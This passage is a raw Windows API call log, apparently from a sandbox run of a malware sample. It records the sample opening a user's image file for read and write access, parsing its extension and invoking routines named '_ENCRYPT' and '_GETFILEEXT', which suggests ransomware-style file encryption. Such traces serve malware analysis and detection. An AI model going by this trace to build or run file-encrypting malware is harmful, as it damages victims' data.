"c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\k_hrf3du.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=100, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc8) returned 0x7c5448 [0039.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=100, lpWideCharStr=0x7c5448, cchWideChar=100 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp") returned 100 [0039.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0039.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.829] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.830] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0039.830] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0039.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.831] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0039.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.832] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ceb0 [0039.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ceb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.832] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0039.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.832] CloseHandle (hObject=0x128) returned 1 [0039.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.833] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.834] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.834] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.834] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.834] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.834] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.834] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.834] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.834] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.834] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.834] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.834] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.834] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.834] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.834] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.834] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1552e0, ftCreationTime.dwHighDateTime=0x1d5bb38, ftLastAccessTime.dwLowDateTime=0x7e736a90, ftLastAccessTime.dwHighDateTime=0x1d5ba54, ftLastWriteTime.dwLowDateTime=0x7e736a90, ftLastWriteTime.dwHighDateTime=0x1d5ba54, nFileSizeHigh=0x0, nFileSizeLow=0x14127, dwReserved0=0x0, dwReserved1=0x777648, cFileName="K_hrf3du.bmp", cAlternateFileName="")) returned 0x7c20c0 [0039.835] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.835] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.835] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1552e0, 